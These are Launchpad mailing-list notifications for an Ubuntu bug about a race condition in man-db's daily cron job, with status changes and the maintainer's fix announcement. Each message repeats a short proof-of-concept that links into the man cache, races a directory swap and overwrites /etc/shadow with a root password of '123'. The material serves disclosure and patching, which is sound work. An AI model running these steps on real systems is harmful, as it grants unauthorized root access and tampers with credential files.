[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
The apport lock file permission was addressed in bug #1862348. ** Changed in: apport (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Fix Released Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
@serge-hallyn: The fix for the reported bug was entirely in man-db (see comment #15), although it was a combination of upstream and packaging work. The apport, pam, and shadow tasks were spun off by @sarnold; the pam/shadow tasks are explained in comment #2. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
@cjwatson - is it safe to assume the fix was entirely in man-db? Or was shadow supposed to do something here as well? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
Was the decision made not to backport this to 14.04 and 16.04 LTS? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
This bug was fixed in the package man-db - 2.7.6.1-1 --- man-db (2.7.6.1-1) unstable; urgency=medium * New upstream release: - Don't chmod CACHEDIR.TAG if it doesn't exist (closes: #847810). -- Colin WatsonMon, 12 Dec 2016 12:51:57 + ** Changed in: man-db (Ubuntu) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
Apologies for my long delay in dealing with these bugs, both reported by halfdog. Fixes turned out to be quite complicated, since in part they involved unwinding incorrect logic from nearly 20 years ago and ensuring that everything else built on that was appropriately adjusted. Here are the relevant sections from my release announcement, which should appear at https://lists.nongnu.org/archive/html/man-db- announce/2016-12/msg0.html in the near future: * SECURITY: Eliminate dangerous setgid-root directories. In the default configuration, cache files and directories are now owned by man:man rather than man:root; man and mandb are now setgid man as well as setuid man (except in the --disable-setuid case). This is a much simpler and safer solution to the original problem that caused my predecessor to make directories setgid root, and doesn't introduce any interesting new privilege since the man group's only real purpose is to be the man user's primary group and nothing in cache directories is group-writeable. Maintainers of distribution packagers should take care to review their installation rules in light of this change. As far as I know this has no CVE ID, but it is described here: http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ [...] Notes for distributors == The security fix above was quite involved. If you're trying to backport it to a stable release, then you should probably consider at least these commits: e62b9edafe00c51e52863718cb2eb1e29385230e Rename some anomalous x* functions 9ab9f3dd9b0d5f290c635995559332c1710e5b4d man(1): Fix gcc warnings 0f8b5518949866075c25787bdc4e9c064597c21e Separate cache owner from --enable-setuid option 94b9d1e2a14ce8790d7c73df00d0bbd9e40cd437 Handle cleanup stack more safely c7f7daa9b2ffbbf4c45a2b168802a51acc2263c0 Make --disable-cache-owner imply --disable-setuid 31552334cecee82809059ec598a37d9ea82683f0 Eliminate dangerous setgid-root directories 755a9551c45da82f99d0ad8e46ef756afbeafb3f Fix distcheck following cache-owner/setuid changes 75701f7fd9a00108abeb851792231b3d9bc2a67d Fix systemd tmpfiles group/perms of /var/cache/man Feel free to contact me if you have difficulty. You should also consider http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/, which could not be fixed without fixing the above bug first; while this bug was in Debian-specific cron jobs, others may have copied them. I've uploaded 2.7.6-1 to unstable with fixes for these vulnerabilities. I'd be happy to help out the Debian and Ubuntu security teams with backports if they need it, although hopefully the above list of git commits is enough to get started. ** Changed in: man-db (Ubuntu) Assignee: (unassigned) => Colin Watson (cjwatson) ** Changed in: man-db (Ubuntu) Importance: Medium => High ** Changed in: man-db (Ubuntu) Status: Confirmed => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Committed Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
** Changed in: apport (Ubuntu) Status: Fix Committed => Confirmed ** Changed in: man-db (Ubuntu) Status: Fix Committed => Confirmed ** Changed in: pam (Ubuntu) Status: Fix Committed => Confirmed ** Changed in: shadow (Ubuntu) Status: Fix Committed => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Confirmed Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
** Changed in: apport (Ubuntu) Status: Confirmed => Fix Committed ** Changed in: man-db (Ubuntu) Status: Confirmed => Fix Committed ** Changed in: pam (Ubuntu) Status: Confirmed => Fix Committed ** Changed in: shadow (Ubuntu) Status: Confirmed => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Fix Committed Status in man-db package in Ubuntu: Fix Committed Status in pam package in Ubuntu: Fix Committed Status in shadow package in Ubuntu: Fix Committed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
** Changed in: man-db (Ubuntu) Importance: Undecided => Medium -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Confirmed Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Confirmed Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp